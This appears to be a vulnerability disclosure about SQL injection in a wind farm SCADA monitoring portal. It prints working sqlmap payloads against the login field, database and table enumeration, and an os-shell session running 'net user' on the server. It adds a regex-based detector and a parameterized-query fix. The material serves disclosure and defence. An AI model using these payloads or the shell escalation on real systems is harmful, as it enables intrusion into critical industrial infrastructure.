2015-12-25: Details reported to the vendor; awaiting vendor response
2015-12-29: Vendor confirmed; details disclosed to the vendor only
2016-01-08: Details disclosed to core white hats and domain experts
2016-01-18: Details disclosed to regular white hats
2016-01-28: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public
Monitoring of an entire wind farm
Wind farm cluster real-time monitoring system
**.**.**.**:88/
The username field is injectable. The back end is a PostgreSQL database, the application connects with DBA privileges, and an os-shell can be obtained.
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1' AND 8282=8282 AND 'VJwJ'='VJwJ&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1';SELECT PG_SLEEP(5)--&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44

    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1' AND 4478=(SELECT 4478 FROM PG_SLEEP(5)) AND 'DVAr'='DVAr&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: PostgreSQL
available databases [9]:
[*] "140212"
[*] "140213"
[*] "140214"
[*] "140901"
[*] "140903"
[*] "140911"
[*] information_schema
[*] pg_catalog
[*] public
Database: public
[65 tables]
calculatefieldinfo
fieldset
groupinfo
log
pathdescr
reportsqlconfig
stdpowercurve
tb_alarm_log
tb_alarmsetting
tb_command_log
tb_commandsending_histricalrecord
tb_commfault
tb_display_kind
tb_eq_kind
tb_equipment
tb_equipment1
tb_equipment_success_time
tb_event_log
tb_fault_code
tb_fault_sms_setting
tb_group_equipment
tb_groups
tb_language
tb_menuitem
tb_path_descr
tb_permission
tb_permission2
tb_preadapter
tb_procmd
tb_productionplan
tb_propaths
tb_propathsconfig
tb_propathsconfig1
tb_protocol
tb_protocol_bak
tb_proxy_conf
tb_realtime_fault_stack
tb_report_set
tb_reportshowfield
tb_reporttemplate
tb_resources
tb_role
tb_role_menu
tb_role_user
tb_role_windfarm
tb_send_information
tb_synlog
tb_system_log
tb_tendata
tb_usbkey_blacklist
tb_user_config
tb_user_info
tb_user_service_config
tb_users
tb_userwebevent
tb_wf_vpn_ip_address
tb_windfarm
tb_windfarm_map_config
tb_wt_avail_algorithm_set
tb_wterrorinfo
tb_wtstatusinfo
tb_wttype
userloginlog
v_propaths
wooyun

There is actually one named wooyun!!! It has no data in it, though.
Ran --os-shell; the server sits on an internal network.
net user
command standard output: 'scada-01\postgres'
command standard output:
---
\SCADA-01 的用户帐户
-------------------------------------------------------------------------------
Administrator
---
command standard output: '¡'
command standard output:
---
\SCADA-01 的用户帐户
-------------------------------------------------------------------------------
Administrator
---
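The three payload types sqlmap reported above (boolean-based, stacked query, time-based) leave distinctive traces in the value submitted to the username field. The following detection logic is an added example for this writeup, not code from the report or the monitoring system. It runs over constructed login-attempt records (timestamp, source IP, submitted username); the assumption is that such records are available at the application layer (IIS access logs do not record POST bodies, so a login log such as the userloginlog table listed above, if it stores the submitted name, would be the realistic source). The IPs, timestamps, benign names and the burst_threshold value are constructed; the three injected values are the ones in the sqlmap output.

```python
import re
from collections import defaultdict

# Constructed sample login attempts: (timestamp, source IP, value submitted in the
# username field). The three injected values are the payloads sqlmap reported in
# this writeup; the other rows are benign filler for comparison.
SAMPLE_LOGIN_ATTEMPTS = [
    ("2015-12-25T10:00:01", "10.0.0.5", "operator"),
    ("2015-12-25T10:00:02", "10.0.0.5", "op3rator"),
    ("2015-12-25T10:01:10", "10.0.0.9", "'or'1'='1' AND 8282=8282 AND 'VJwJ'='VJwJ"),
    ("2015-12-25T10:01:11", "10.0.0.9", "'or'1'='1';SELECT PG_SLEEP(5)--"),
    ("2015-12-25T10:01:12", "10.0.0.9",
     "'or'1'='1' AND 4478=(SELECT 4478 FROM PG_SLEEP(5)) AND 'DVAr'='DVAr"),
    ("2015-12-25T10:02:00", "10.0.0.7", "o'brien"),
]

# One signature per technique that appears in the sqlmap output above.
SIGNATURES = {
    # 'or'1'='1 : always-true clause spliced into the WHERE
    "tautology": re.compile(r"\bor\b\s*'?\s*\w+\s*'?\s*=\s*'?\s*\w+", re.I),
    # 8282=8282 : boolean-based blind probe comparing a number with itself
    "self_comparison": re.compile(r"\b(\d+)\s*=\s*\1\b"),
    # PG_SLEEP(5) and equivalents : time-based blind probe
    "time_delay": re.compile(
        r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(", re.I),
    # ;SELECT ... : a second statement stacked after the original query
    "stacked_query": re.compile(
        r";\s*(select|insert|update|delete|drop|copy|create)\b", re.I),
    # trailing -- or /* : comment that discards the rest of the original query
    "comment_terminator": re.compile(r"--\s*$|/\*"),
}


def classify(value):
    """Names of the injection signatures present in one submitted username."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def analyze(attempts, burst_threshold=3):
    """Summarise attempts per source IP and assign a verdict.

    A lone unbalanced quote (o'brien) is counted but never escalated on its own,
    because legitimate names contain apostrophes. burst_threshold is an assumed
    tuning value for this constructed sample.
    """
    per_ip = defaultdict(lambda: {"attempts": 0, "signatures": set(), "odd_quote_only": 0})
    for _timestamp, ip, value in attempts:
        record = per_ip[ip]
        record["attempts"] += 1
        hits = classify(value)
        record["signatures"].update(hits)
        if not hits and value.count("'") % 2 == 1:
            record["odd_quote_only"] += 1

    findings = {}
    for ip, record in per_ip.items():
        if record["signatures"]:
            verdict = "sqli"
        elif record["attempts"] >= burst_threshold:
            verdict = "burst"  # many attempts without a signature: worth a look
        else:
            verdict = "benign"
        findings[ip] = {
            "verdict": verdict,
            "attempts": record["attempts"],
            "signatures": sorted(record["signatures"]),
            "odd_quote_only": record["odd_quote_only"],
        }
    return findings


if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOGIN_ATTEMPTS).items():
        print(ip, finding)
```

On the sample, 10.0.0.9 is flagged as sqli with all three techniques recorded, while the apostrophe in o'brien only increments the weak-indicator counter. Signature matching of this kind is a detective control; it does not replace fixing the query construction.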
This is a large wind farm cluster, comprising two wind farms and several hundred wind turbines in total.
Wind farm information
Number of wind farms: 1
Installed capacity (kW): 48000 kW
Average wind speed: 6.30 m/s
Active power: 4942 kW
Reactive power: 0 kVar
Energy generated this year: 49786880 kWh (that is a lot of generation)
Fix: remediate the SQL injection; change the passwords.
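To make the fix concrete, here is an added example (not code from the report or from the monitoring system) showing the injectable login lookup beside its parameterized replacement, using the boolean-based payload from the sqlmap output above. SQLite stands in for PostgreSQL so the example runs offline; the table name tb_users comes from the table list above, but its columns, the two accounts, the demo passwords and the fixed salt are constructed. The assumption is that the original application built its WHERE clause by concatenating the submitted username, which is what the injection in the username field implies.

```python
import hashlib
import hmac
import sqlite3

# Assumption: a single fixed salt keeps the example short; real storage uses a
# random per-user salt.
SALT = b"constructed-demo-salt"

# The boolean-based blind payload reported by sqlmap in this writeup.
PAYLOAD = "'or'1'='1' AND 8282=8282 AND 'VJwJ'='VJwJ"


def pw_hash(password: str) -> str:
    """PBKDF2-SHA256 password hash, hex encoded."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the portal's tb_users table (SQLite in place of PostgreSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO tb_users VALUES (?, ?)",
        [("operator", pw_hash("demo-operator-pass")),
         ("admin", pw_hash("demo-admin-pass"))],
    )
    return conn


def lookup_vulnerable(conn, username):
    """WHERE clause built by string concatenation: the input can rewrite the predicate."""
    sql = "SELECT username FROM tb_users WHERE username='" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    """Same query with a bound parameter: the input is only ever compared as a value."""
    sql = "SELECT username FROM tb_users WHERE username=?"
    return [row[0] for row in conn.execute(sql, (username,))]


def authenticate(conn, username, password):
    """Parameterized lookup followed by a constant-time hash comparison."""
    row = conn.execute(
        "SELECT pw_hash FROM tb_users WHERE username=?", (username,)
    ).fetchone()
    if row is None:
        # Hash anyway so an unknown user costs the same time as a wrong password.
        hmac.compare_digest(pw_hash(password), pw_hash(""))
        return False
    return hmac.compare_digest(pw_hash(password), row[0])


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable lookup with payload:   ", lookup_vulnerable(conn, PAYLOAD))
    print("parameterized lookup with payload:", lookup_parameterized(conn, PAYLOAD))
    print("authenticate(operator, correct):  ", authenticate(conn, "operator", "demo-operator-pass"))
    print("authenticate(payload, anything):  ", authenticate(conn, PAYLOAD, "x"))
```

With the concatenated query the payload's always-true clause returns every row, which is exactly the true/false oracle that boolean-based blind injection relies on; with the bound parameter the same string matches no row. Separately from the query fix, the report notes the application connected as DBA, which is what made os-shell possible; the application account should be a non-superuser role holding only the table privileges it needs, so that a residual injection cannot reach operating-system-level features.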
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-29 18:38
CNVD has confirmed and reproduced the described situation; the case has been forwarded by CNCERT to the energy sector's information technology authorities, who will coordinate handling with the organization operating the website.
None for now